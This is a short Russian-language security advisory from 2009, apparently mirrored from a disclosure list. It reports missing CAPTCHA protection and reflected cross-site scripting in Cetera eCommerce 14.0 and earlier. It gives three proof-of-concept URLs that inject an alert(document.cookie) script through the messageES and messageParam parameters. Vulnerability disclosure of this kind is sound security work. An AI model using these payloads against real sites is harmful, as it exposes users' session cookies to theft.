Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22990
HistoryDec 23, 2009 - 12:00 a.m.

Vulnerabilities in Cetera CMS

2009-12-2300:00:00
vulners.com
17

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Insufficient Anti-automation и Cross-Site Scripting
уязвимостях в Cetera eCommerce.

Insufficient Anti-automation:

http://site/

http://site/account/

На данных страницах отсутствует защита от автоматизированных запросов (капча).

XSS:

http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвимы Cetera eCommerce 14.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3640/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua